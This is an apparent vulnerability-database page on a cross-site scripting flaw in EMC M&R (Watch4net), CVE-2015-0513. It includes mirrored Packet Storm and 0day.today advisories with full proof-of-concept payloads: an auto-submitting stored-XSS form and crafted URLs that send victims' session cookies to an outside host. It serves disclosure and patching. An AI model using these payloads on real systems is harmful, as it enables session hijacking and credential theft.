Cross-Site Scripting vulnerability in EMC M&R (Watch4net) Web Portal Report Favorites
2015-03-21T00:00:00
ID SECURITYVULNS:DOC:31825 Type securityvulns Reporter Securityvulns Modified 2015-03-21T00:00:00
Description
Cross-Site Scripting vulnerability in EMC M&R (Watch4net) Web Portal
Report Favorites
Han Sahin, November 2014
Abstract
A Cross-Site Scripting vulnerability was found in EMC M&R (Watch4net)
Web Portal. This issue allows attackers to replace the report that is
shown at startup, the attackers payload will be stored in the user's
profile and will be executed every time the victim logs in. The
attacker-supplied code can perform a wide variety of actions, such as
stealing victims' session tokens or login credentials, performing
arbitrary actions on their behalf, logging their keystrokes, or exploit
issues in other areas of Watch4net.
Affected products
EMC reports that the following products are affected by this
vulnerability:
{"id": "SECURITYVULNS:DOC:31825", "bulletinFamily": "software", "title": "Cross-Site Scripting vulnerability in EMC M&R (Watch4net) Web Portal Report Favorites", "description": "\r\n------------------------------------------------------------------------\r\nCross-Site Scripting vulnerability in EMC M&R (Watch4net) Web Portal\r\nReport Favorites\r\n------------------------------------------------------------------------\r\nHan Sahin, November 2014\r\n\r\n------------------------------------------------------------------------\r\nAbstract\r\n------------------------------------------------------------------------\r\nA Cross-Site Scripting vulnerability was found in EMC M&R (Watch4net)\r\nWeb Portal. This issue allows attackers to replace the report that is\r\nshown at startup, the attackers payload will be stored in the user's\r\nprofile and will be executed every time the victim logs in. The\r\nattacker-supplied code can perform a wide variety of actions, such as\r\nstealing victims' session tokens or login credentials, performing\r\narbitrary actions on their behalf, logging their keystrokes, or exploit\r\nissues in other areas of Watch4net.\r\n\r\n------------------------------------------------------------------------\r\nAffected products\r\n------------------------------------------------------------------------\r\nEMC reports that the following products are affected by this\r\nvulnerability:\r\n\r\n- EMC M&R (Watch4Net) versions prior 6.5u1\r\n- EMC ViPR SRM versions prior to 3.6.1\r\n\r\n------------------------------------------------------------------------\r\nSee also\r\n------------------------------------------------------------------------\r\n- CVE-2015-0513\r\n- ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities\r\n\r\n------------------------------------------------------------------------\r\nFix\r\n------------------------------------------------------------------------\r\nEMC released the following updated versions that resolve this\r\nvulnerability:\r\n\r\n- EMC M&R (Watch4Net) 6.5u1\r\n- EMC ViPR SRM 3.6.1\r\n\r\nRegistered customers can download upgraded software from support.emc.com\r\nat https://support.emc.com/downloads/34247_ViPR-SRM.\r\n\r\n------------------------------------------------------------------------\r\nDetails\r\n------------------------------------------------------------------------\r\nhttps://www.securify.nl/advisory/SFY20141102/cross_site_scripting_vulnerability_in_emc_m_r__watch4net__web_portal_report_favorites.html\r\n", "published": "2015-03-21T00:00:00", "modified": "2015-03-21T00:00:00", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31825", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2015-0513"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:58", "edition": 1, "viewCount": 13, "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2018-08-31T11:10:58", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-0513"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31664", "SECURITYVULNS:DOC:31824", "SECURITYVULNS:VULN:14236", "SECURITYVULNS:DOC:31823"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:130917", "PACKETSTORM:130919", "PACKETSTORM:130918"]}, {"type": "zdt", "idList": ["1337DAY-ID-23424", "1337DAY-ID-23423", "1337DAY-ID-23422"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105241"]}], "modified": "2018-08-31T11:10:58", "rev": 2}, "vulnersScore": 6.4}, "affectedSoftware": []}
{"cve": [{"lastseen": "2020-12-09T20:03:00", "description": "Multiple cross-site scripting (XSS) vulnerabilities in the administrative user interface in EMC M&R (aka Watch4Net) before 6.5u1 and ViPR SRM before 3.6.1 allow remote authenticated users to inject arbitrary web script or HTML by leveraging privileged access to set crafted values of unspecified fields.", "edition": 5, "cvss3": {}, "published": "2015-01-21T15:17:00", "title": "CVE-2015-0513", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0513"], "modified": "2017-01-03T02:59:00", "cpe": ["cpe:/a:emc:vipr_srm:3.6.0", "cpe:/a:emc:watch4net:6.5"], "id": "CVE-2015-0513", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0513", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:emc:watch4net:6.5:*:*:*:*:*:*:*", "cpe:2.3:a:emc:vipr_srm:3.6.0:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:12:39", "description": "", "published": "2015-03-20T00:00:00", "type": "packetstorm", "title": "EMC M&R (Watch4net) Web Portal Report Favorites XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0513"], "modified": "2015-03-20T00:00:00", "id": "PACKETSTORM:130917", "href": "https://packetstormsecurity.com/files/130917/EMC-M-R-Watch4net-Web-Portal-Report-Favorites-XSS.html", "sourceData": "`------------------------------------------------------------------------ \nCross-Site Scripting vulnerability in EMC M&R (Watch4net) Web Portal \nReport Favorites \n------------------------------------------------------------------------ \nHan Sahin, November 2014 \n \n------------------------------------------------------------------------ \nAbstract \n------------------------------------------------------------------------ \nA Cross-Site Scripting vulnerability was found in EMC M&R (Watch4net) \nWeb Portal. This issue allows attackers to replace the report that is \nshown at startup, the attackers payload will be stored in the user's \nprofile and will be executed every time the victim logs in. The \nattacker-supplied code can perform a wide variety of actions, such as \nstealing victims' session tokens or login credentials, performing \narbitrary actions on their behalf, logging their keystrokes, or exploit \nissues in other areas of Watch4net. \n \n------------------------------------------------------------------------ \nAffected products \n------------------------------------------------------------------------ \nEMC reports that the following products are affected by this \nvulnerability: \n \n- EMC M&R (Watch4Net) versions prior 6.5u1 \n- EMC ViPR SRM versions prior to 3.6.1 \n \n------------------------------------------------------------------------ \nSee also \n------------------------------------------------------------------------ \n- CVE-2015-0513 \n- ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities \n \n------------------------------------------------------------------------ \nFix \n------------------------------------------------------------------------ \nEMC released the following updated versions that resolve this \nvulnerability: \n \n- EMC M&R (Watch4Net) 6.5u1 \n- EMC ViPR SRM 3.6.1 \n \nRegistered customers can download upgraded software from support.emc.com \nat https://support.emc.com/downloads/34247_ViPR-SRM. \n \n------------------------------------------------------------------------ \nDetails \n------------------------------------------------------------------------ \nhttps://www.securify.nl/advisory/SFY20141102/cross_site_scripting_vulnerability_in_emc_m_r__watch4net__web_portal_report_favorites.html \n \nThis vulnerability exists due to the fact that the description_0 POST parameter is not properly encoded when rendering the selected report. In order to exploit this issue, an attacker must trick a victim into opening a specially crafted web page, for example by send the link via email, posting the link on a (trusted) website or through other means. \n \nThis issue allows attackers to replace the report that is shown at startup, the attackers payload will be stored in the user's profile and will be executed every time the victim logs in. The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, logging their keystrokes, or exploit issues in other areas of Watch4net. \n \nThe following proof of concept demonstrates this issue. It will use JavaScript to send the session cookie(s) to an attacker controlled website. \n \n<html> \n<body> \n<form action=\"http://<target>:58080/APG/form\" method=\"POST\"> \n<input type=\"hidden\" name=\"form-id\" value=\"FavoriteForm\" /> \n<input type=\"hidden\" name=\"favorite-count\" value=\"1\" /> \n<input type=\"hidden\" name=\"ident_0\" value=\"Operations\" /> \n<input type=\"hidden\" name=\"name_0\" value=\"XSS\" /> \n<input type=\"hidden\" name=\"description_0\" value=\"?report&select=0-a&display=0&mode=srt&statistics=none&lower=0.0&upper=&type=3&period=3600&durationType=l&duration=1w&itz=Europe%2FBerlin\"><img src=x onerror=this.src='https://www.securify.nl/?c='+document.cookie>\" /> \n<input type=\"hidden\" name=\"home\" value=\"home_0\" /> \n<input type=\"submit\" value=\"Submit request\" /> \n</form> \n<script> \ndocument.forms[0].submit(); \n</script> \n</body> \n</html> \n`\n", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/130917/emcmrportal-xss.txt"}, {"lastseen": "2016-12-05T22:20:22", "description": "", "published": "2015-03-20T00:00:00", "type": "packetstorm", "title": "EMC M&R (Watch4net) Centralized Management Console XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0513"], "modified": "2015-03-20T00:00:00", "id": "PACKETSTORM:130918", "href": "https://packetstormsecurity.com/files/130918/EMC-M-R-Watch4net-Centralized-Management-Console-XSS.html", "sourceData": "`------------------------------------------------------------------------ \nCross-Site Scripting vulnerability in EMC M&R (Watch4net) Centralized \nManagement Console \n------------------------------------------------------------------------ \nHan Sahin, November 2014 \n \n------------------------------------------------------------------------ \nAbstract \n------------------------------------------------------------------------ \nA Cross-Site Scripting vulnerability was found in EMC M&R (Watch4net) \nCentralized Management Console. This issue allows attackers to perform a \nwide variety of actions, such as stealing victims' session tokens or \nlogin credentials, performing arbitrary actions on their behalf, logging \ntheir keystrokes, or exploit issues in other areas of Watch4net. \n \n------------------------------------------------------------------------ \nAffected products \n------------------------------------------------------------------------ \nEMC reports that the following products are affected by this \nvulnerability: \n \n- EMC M&R (Watch4Net) versions prior 6.5u1 \n- EMC ViPR SRM versions prior to 3.6.1 \n \n------------------------------------------------------------------------ \nSee also \n------------------------------------------------------------------------ \n- CVE-2015-0513 \n- ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities \n \n------------------------------------------------------------------------ \nFix \n------------------------------------------------------------------------ \nEMC released the following updated versions that resolve this \nvulnerability: \n \n- EMC M&R (Watch4Net) 6.5u1 \n- EMC ViPR SRM 3.6.1 \n \nRegistered customers can download upgraded software from support.emc.com \nat https://support.emc.com/downloads/34247_ViPR-SRM. \n \n------------------------------------------------------------------------ \nDetails \n------------------------------------------------------------------------ \nhttps://www.securify.nl/advisory/SFY20141103/cross_site_scripting_vulnerability_in_emc_m_r__watch4net__centralized_management_console.html \n \nThis vulnerability can be exploited using the answerLocations[0].blockName URL parameter. Tricking a victim into visiting a specially crafted URL allows attackers to run arbitrary client-side scripting code within the victim's browser. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. \n \nThe following proof of concept demonstrates that it is possible to inject arbitrary JavaScript into the application's response in order to hijack the victim's session cookies: \n \nhttp://<target>:58080/centralized-management/locker/update?answer={%22gateway%22:{}}&answerLocations%5B0%5D.answerId=topologyservice.gateway&answerLocations%5B0%5D.blockId=generic-rsc&answerLocations%5B0%5D.blockInstance=Generic-RSC&answerLocations%5B0%5D.blockName=generic-rsc%22%3Cimg+src%3dx+onerror%3dthis.src%3d%27https%3a//www.securify.nl/%3fc%3d%27%2bdocument.cookie%3E&answerLocations%5B0%5D.blockVersion=3.1.1&answerLocations%5B0%5D.serverId=sdfef19fb&answerLocations%5B0%5D.spId=&answerLocations%5B1%5D.answerId=topologyservice.gateway&answerLocations%5B1%5D.blockId=generic-snmp&answerLocations%5B1%5D.blockInstance=Generic-SNMP&answerLocations%5B1%5D.blockName=generic-snmp&answerLocations%5B1%5D.blockVersion=3.1.1&answerLocations%5B1%5D.serverId=sdfef19fb&answerLocations%5B1%5D.spId=&answerLocations%5B2%5D.answerId=arbiter.backend%5B0%5D.webservice.gateway&answerLocations%5B2%5D.blockId=load-balancer-arbiter&answerLocations%5B2%5D.blockInstance=Load-Balancer&answerLocations%5B2%5D.blockName=load-balancer-arbiter&answerLocations%5B2%5D.blockVersion=3.1.1&answerLocations%5B2%5D.serverId=sdfef19fb&answerLocations%5B2%5D.spId= \n`\n", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/130918/emcmrcmc-xss.txt"}, {"lastseen": "2016-12-05T22:22:13", "description": "", "published": "2015-03-20T00:00:00", "type": "packetstorm", "title": "EMC M&R (Watch4net) Alerting Frontend XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0513"], "modified": "2015-03-20T00:00:00", "id": "PACKETSTORM:130919", "href": "https://packetstormsecurity.com/files/130919/EMC-M-R-Watch4net-Alerting-Frontend-XSS.html", "sourceData": "`------------------------------------------------------------------------ \nCross-Site Scripting vulnerability in EMC M&R (Watch4net) Alerting \nFrontend \n------------------------------------------------------------------------ \nHan Sahin, November 2014 \n \n------------------------------------------------------------------------ \nAbstract \n------------------------------------------------------------------------ \nA Cross-Site Scripting vulnerability was found in EMC M&R (Watch4net) \nAlerting Frontend. This issue allows attackers to perform a wide \nvariety of actions, such as stealing victims' session tokens or login \ncredentials, performing arbitrary actions on their behalf, logging their \nkeystrokes, or exploit issues in other areas of Watch4net. \n \n------------------------------------------------------------------------ \nAffected products \n------------------------------------------------------------------------ \nEMC reports that the following products are affected by this \nvulnerability: \n \n- EMC M&R (Watch4Net) versions prior 6.5u1 \n- EMC ViPR SRM versions prior to 3.6.1 \n \n------------------------------------------------------------------------ \nSee also \n------------------------------------------------------------------------ \n- CVE-2015-0513 \n- ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities \n \n------------------------------------------------------------------------ \nFix \n------------------------------------------------------------------------ \nEMC released the following updated versions that resolve this \nvulnerability: \n \n- EMC M&R (Watch4Net) 6.5u1 \n- EMC ViPR SRM 3.6.1 \n \nRegistered customers can download upgraded software from support.emc.com \nat https://support.emc.com/downloads/34247_ViPR-SRM. \n \n------------------------------------------------------------------------ \nDetails \n------------------------------------------------------------------------ \nhttps://www.securify.nl/advisory/SFY20141104/cross_site_scripting_vulnerability_in_emc_m_r__watch4net__alerting_frontend.html \n \nThis vulnerability can be exploited using the manager URL parameter. Tricking a victim into visiting a specially crafted URL allows attackers to run arbitrary client-side scripting code within the victim's browser. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. \n \nThe following proof of concept demonstrates that it is possible to inject arbitrary JavaScript into the application's response in order to hijack the victim's session cookies: \n \nhttp://<target>:58080/alerting-frontend/adapters/get?manager=Local%20Manager%3Cimg+src%3dx+onerror%3dthis.src%3d%27https%3a//www.securify.nl/%3fc%3d%27%2bdocument.cookie%3E&_=1411480546258 \n`\n", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/130919/emcmralerting-xss.txt"}], "zdt": [{"lastseen": "2018-01-01T07:06:21", "edition": 2, "description": "A cross site scripting vulnerability was found in EMC M&R (Watch4net) Centralized Management Console. This issue allows attackers to perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, logging their keystrokes, or exploit issues in other areas of Watch4net.", "published": "2015-03-20T00:00:00", "type": "zdt", "title": "EMC M&R (Watch4net) Centralized Management Console XSS Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0513"], "modified": "2015-03-20T00:00:00", "id": "1337DAY-ID-23423", "href": "https://0day.today/exploit/description/23423", "sourceData": "------------------------------------------------------------------------\r\nCross-Site Scripting vulnerability in EMC M&R (Watch4net) Centralized\r\nManagement Console\r\n------------------------------------------------------------------------\r\nHan Sahin, November 2014\r\n\r\n------------------------------------------------------------------------\r\nAbstract\r\n------------------------------------------------------------------------\r\nA Cross-Site Scripting vulnerability was found in EMC M&R (Watch4net)\r\nCentralized Management Console. This issue allows attackers to perform a\r\nwide variety of actions, such as stealing victims' session tokens or\r\nlogin credentials, performing arbitrary actions on their behalf, logging\r\ntheir keystrokes, or exploit issues in other areas of Watch4net.\r\n\r\n------------------------------------------------------------------------\r\nAffected products\r\n------------------------------------------------------------------------\r\nEMC reports that the following products are affected by this\r\nvulnerability:\r\n\r\n- EMC M&R (Watch4Net) versions prior 6.5u1\r\n- EMC ViPR SRM versions prior to 3.6.1\r\n\r\n------------------------------------------------------------------------\r\nSee also\r\n------------------------------------------------------------------------\r\n- CVE-2015-0513\r\n- ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities\r\n\r\n------------------------------------------------------------------------\r\nFix\r\n------------------------------------------------------------------------\r\nEMC released the following updated versions that resolve this\r\nvulnerability:\r\n\r\n- EMC M&R (Watch4Net) 6.5u1\r\n- EMC ViPR SRM 3.6.1\r\n\r\nRegistered customers can download upgraded software from support.emc.com\r\nat https://support.emc.com/downloads/34247_ViPR-SRM.\r\n\r\n------------------------------------------------------------------------\r\nDetails\r\n------------------------------------------------------------------------\r\nhttps://www.securify.nl/advisory/SFY20141103/cross_site_scripting_vulnerability_in_emc_m_r__watch4net__centralized_management_console.html\r\n\r\nThis vulnerability can be exploited using the answerLocations[0].blockName URL parameter. Tricking a victim into visiting a specially crafted URL allows attackers to run arbitrary client-side scripting code within the victim's browser. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.\r\n\r\nThe following proof of concept demonstrates that it is possible to inject arbitrary JavaScript into the application's response in order to hijack the victim's session cookies:\r\n\r\nhttp://<target>:58080/centralized-management/locker/update?answer={%22gateway%22:{}}&answerLocations%5B0%5D.answerId=topologyservice.gateway&answerLocations%5B0%5D.blockId=generic-rsc&answerLocations%5B0%5D.blockInstance=Generic-RSC&answerLocations%5B0%5D.blockName=generic-rsc%22%3Cimg+src%3dx+onerror%3dthis.src%3d%27https%3a//www.securify.nl/%3fc%3d%27%2bdocument.cookie%3E&answerLocations%5B0%5D.blockVersion=3.1.1&answerLocations%5B0%5D.serverId=sdfef19fb&answerLocations%5B0%5D.spId=&answerLocations%5B1%5D.answerId=topologyservice.gateway&answerLocations%5B1%5D.blockId=generic-snmp&answerLocations%5B1%5D.blockInstance=Generic-SNMP&answerLocations%5B1%5D.blockName=generic-snmp&answerLocations%5B1%5D.blockVersion=3.1.1&answerLocations%5B1%5D.serverId=sdfef19fb&answerLocations%5B1%5D.spId=&answerLocations%5B2%5D.answerId=arbiter.backend%5B0%5D.webservice.gateway&answerLocations%5B2%5D.blockId=load-balancer-arbiter&answerLocations%5B2%5D.blockInstance=Load-Balancer&answerLocations%5B2%5D.blockName=load-balancer-arbiter&answerLocations%5B2%5D.blockVersion=3.1.1&answerLocations%5B2%5D.serverId=sdfef19fb&answerLocations%5B2%5D.spId=\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/23423"}, {"lastseen": "2018-01-10T07:05:49", "description": "A cross site scripting vulnerability was found in EMC M&R (Watch4net) Alerting Frontend. This issue allows attackers to perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, logging their keystrokes, or exploit issues in other areas of Watch4net.", "edition": 2, "published": "2015-03-20T00:00:00", "type": "zdt", "title": "EMC M&R (Watch4net) Alerting Frontend XSS Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0513"], "modified": "2015-03-20T00:00:00", "id": "1337DAY-ID-23422", "href": "https://0day.today/exploit/description/23422", "sourceData": "------------------------------------------------------------------------\r\nCross-Site Scripting vulnerability in EMC M&R (Watch4net) Alerting\r\nFrontend\r\n------------------------------------------------------------------------\r\nHan Sahin, November 2014\r\n\r\n------------------------------------------------------------------------\r\nAbstract\r\n------------------------------------------------------------------------\r\nA Cross-Site Scripting vulnerability was found in EMC M&R (Watch4net)\r\nAlerting Frontend. This issue allows attackers to perform a wide\r\nvariety of actions, such as stealing victims' session tokens or login\r\ncredentials, performing arbitrary actions on their behalf, logging their\r\nkeystrokes, or exploit issues in other areas of Watch4net.\r\n\r\n------------------------------------------------------------------------\r\nAffected products\r\n------------------------------------------------------------------------\r\nEMC reports that the following products are affected by this\r\nvulnerability:\r\n\r\n- EMC M&R (Watch4Net) versions prior 6.5u1\r\n- EMC ViPR SRM versions prior to 3.6.1\r\n\r\n------------------------------------------------------------------------\r\nSee also\r\n------------------------------------------------------------------------\r\n- CVE-2015-0513\r\n- ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities\r\n\r\n------------------------------------------------------------------------\r\nFix\r\n------------------------------------------------------------------------\r\nEMC released the following updated versions that resolve this\r\nvulnerability:\r\n\r\n- EMC M&R (Watch4Net) 6.5u1\r\n- EMC ViPR SRM 3.6.1\r\n\r\nRegistered customers can download upgraded software from support.emc.com\r\nat https://support.emc.com/downloads/34247_ViPR-SRM.\r\n\r\n------------------------------------------------------------------------\r\nDetails\r\n------------------------------------------------------------------------\r\nhttps://www.securify.nl/advisory/SFY20141104/cross_site_scripting_vulnerability_in_emc_m_r__watch4net__alerting_frontend.html\r\n\r\nThis vulnerability can be exploited using the manager URL parameter. Tricking a victim into visiting a specially crafted URL allows attackers to run arbitrary client-side scripting code within the victim's browser. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.\r\n\r\nThe following proof of concept demonstrates that it is possible to inject arbitrary JavaScript into the application's response in order to hijack the victim's session cookies:\r\n\r\nhttp://<target>:58080/alerting-frontend/adapters/get?manager=Local%20Manager%3Cimg+src%3dx+onerror%3dthis.src%3d%27https%3a//www.securify.nl/%3fc%3d%27%2bdocument.cookie%3E&_=1411480546258\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/23422"}, {"lastseen": "2018-02-16T01:20:27", "edition": 2, "description": "A cross site scripting vulnerability was found in EMC M&R (Watch4net) Web Portal. This issue allows attackers to replace the report that is shown at startup, the attackers payload will be stored in the user's profile and will be executed every time the victim logs in.", "published": "2015-03-20T00:00:00", "type": "zdt", "title": "EMC M&R (Watch4net) Web Portal Report Favorites XSS Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0513"], "modified": "2015-03-20T00:00:00", "id": "1337DAY-ID-23424", "href": "https://0day.today/exploit/description/23424", "sourceData": "------------------------------------------------------------------------\r\nCross-Site Scripting vulnerability in EMC M&R (Watch4net) Web Portal\r\nReport Favorites\r\n------------------------------------------------------------------------\r\nHan Sahin, November 2014\r\n\r\n------------------------------------------------------------------------\r\nAbstract\r\n------------------------------------------------------------------------\r\nA Cross-Site Scripting vulnerability was found in EMC M&R (Watch4net)\r\nWeb Portal. This issue allows attackers to replace the report that is\r\nshown at startup, the attackers payload will be stored in the user's\r\nprofile and will be executed every time the victim logs in. The\r\nattacker-supplied code can perform a wide variety of actions, such as\r\nstealing victims' session tokens or login credentials, performing\r\narbitrary actions on their behalf, logging their keystrokes, or exploit\r\nissues in other areas of Watch4net.\r\n\r\n------------------------------------------------------------------------\r\nAffected products\r\n------------------------------------------------------------------------\r\nEMC reports that the following products are affected by this\r\nvulnerability:\r\n\r\n- EMC M&R (Watch4Net) versions prior 6.5u1\r\n- EMC ViPR SRM versions prior to 3.6.1\r\n\r\n------------------------------------------------------------------------\r\nSee also\r\n------------------------------------------------------------------------\r\n- CVE-2015-0513\r\n- ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities\r\n\r\n------------------------------------------------------------------------\r\nFix\r\n------------------------------------------------------------------------\r\nEMC released the following updated versions that resolve this\r\nvulnerability:\r\n\r\n- EMC M&R (Watch4Net) 6.5u1\r\n- EMC ViPR SRM 3.6.1\r\n\r\nRegistered customers can download upgraded software from support.emc.com\r\nat https://support.emc.com/downloads/34247_ViPR-SRM.\r\n\r\n------------------------------------------------------------------------\r\nDetails\r\n------------------------------------------------------------------------\r\nhttps://www.securify.nl/advisory/SFY20141102/cross_site_scripting_vulnerability_in_emc_m_r__watch4net__web_portal_report_favorites.html\r\n\r\nThis vulnerability exists due to the fact that the description_0 POST parameter is not properly encoded when rendering the selected report. In order to exploit this issue, an attacker must trick a victim into opening a specially crafted web page, for example by send the link via email, posting the link on a (trusted) website or through other means.\r\n\r\nThis issue allows attackers to replace the report that is shown at startup, the attackers payload will be stored in the user's profile and will be executed every time the victim logs in. The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, logging their keystrokes, or exploit issues in other areas of Watch4net.\r\n\r\nThe following proof of concept demonstrates this issue. It will use JavaScript to send the session cookie(s) to an attacker controlled website.\r\n\r\n<html>\r\n <body>\r\n <form action=\"http://<target>:58080/APG/form\" method=\"POST\">\r\n <input type=\"hidden\" name=\"form-id\" value=\"FavoriteForm\" />\r\n <input type=\"hidden\" name=\"favorite-count\" value=\"1\" />\r\n <input type=\"hidden\" name=\"ident_0\" value=\"Operations\" />\r\n <input type=\"hidden\" name=\"name_0\" value=\"XSS\" />\r\n <input type=\"hidden\" name=\"description_0\" value=\"?report&select=0-a&display=0&mode=srt&statistics=none&lower=0.0&upper=&type=3&period=3600&durationType=l&duration=1w&itz=Europe%2FBerlin\"><img src=x onerror=this.src='https://www.securify.nl/?c='+document.cookie>\" />\r\n <input type=\"hidden\" name=\"home\" value=\"home_0\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n <script>\r\n document.forms[0].submit();\r\n </script>\r\n </body>\r\n</html>\n\n# 0day.today [2018-02-15] #", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/23424"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:58", "bulletinFamily": "software", "cvelist": ["CVE-2015-0513"], "description": "\r\n------------------------------------------------------------------------\r\nCross-Site Scripting vulnerability in EMC M&R (Watch4net) Centralized\r\nManagement Console\r\n------------------------------------------------------------------------\r\nHan Sahin, November 2014\r\n\r\n------------------------------------------------------------------------\r\nAbstract\r\n------------------------------------------------------------------------\r\nA Cross-Site Scripting vulnerability was found in EMC M&R (Watch4net)\r\nCentralized Management Console. This issue allows attackers to perform a\r\nwide variety of actions, such as stealing victims' session tokens or\r\nlogin credentials, performing arbitrary actions on their behalf, logging\r\ntheir keystrokes, or exploit issues in other areas of Watch4net.\r\n\r\n------------------------------------------------------------------------\r\nAffected products\r\n------------------------------------------------------------------------\r\nEMC reports that the following products are affected by this\r\nvulnerability:\r\n\r\n- EMC M&R (Watch4Net) versions prior 6.5u1\r\n- EMC ViPR SRM versions prior to 3.6.1\r\n\r\n------------------------------------------------------------------------\r\nSee also\r\n------------------------------------------------------------------------\r\n- CVE-2015-0513\r\n- ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities\r\n\r\n------------------------------------------------------------------------\r\nFix\r\n------------------------------------------------------------------------\r\nEMC released the following updated versions that resolve this\r\nvulnerability:\r\n\r\n- EMC M&R (Watch4Net) 6.5u1\r\n- EMC ViPR SRM 3.6.1\r\n\r\nRegistered customers can download upgraded software from support.emc.com\r\nat https://support.emc.com/downloads/34247_ViPR-SRM.\r\n\r\n------------------------------------------------------------------------\r\nDetails\r\n------------------------------------------------------------------------\r\nhttps://www.securify.nl/advisory/SFY20141103/cross_site_scripting_vulnerability_in_emc_m_r__watch4net__centralized_management_console.html\r\n", "edition": 1, "modified": "2015-03-21T00:00:00", "published": "2015-03-21T00:00:00", "id": "SECURITYVULNS:DOC:31824", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31824", "title": "Cross-Site Scripting vulnerability in EMC M&R (Watch4net) Centralized Management Console", "type": "securityvulns", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:58", "bulletinFamily": "software", "cvelist": ["CVE-2015-0513"], "description": "\r\n------------------------------------------------------------------------\r\nCross-Site Scripting vulnerability in EMC M&R (Watch4net) Alerting\r\nFrontend\r\n------------------------------------------------------------------------\r\nHan Sahin, November 2014\r\n\r\n------------------------------------------------------------------------\r\nAbstract\r\n------------------------------------------------------------------------\r\nA Cross-Site Scripting vulnerability was found in EMC M&R (Watch4net)\r\nAlerting Frontend. This issue allows attackers to perform a wide\r\nvariety of actions, such as stealing victims' session tokens or login\r\ncredentials, performing arbitrary actions on their behalf, logging their\r\nkeystrokes, or exploit issues in other areas of Watch4net.\r\n\r\n------------------------------------------------------------------------\r\nAffected products\r\n------------------------------------------------------------------------\r\nEMC reports that the following products are affected by this\r\nvulnerability:\r\n\r\n- EMC M&R (Watch4Net) versions prior 6.5u1\r\n- EMC ViPR SRM versions prior to 3.6.1\r\n\r\n------------------------------------------------------------------------\r\nSee also\r\n------------------------------------------------------------------------\r\n- CVE-2015-0513\r\n- ESA-2015-004: EMC M&R (Watch4Net) Multiple 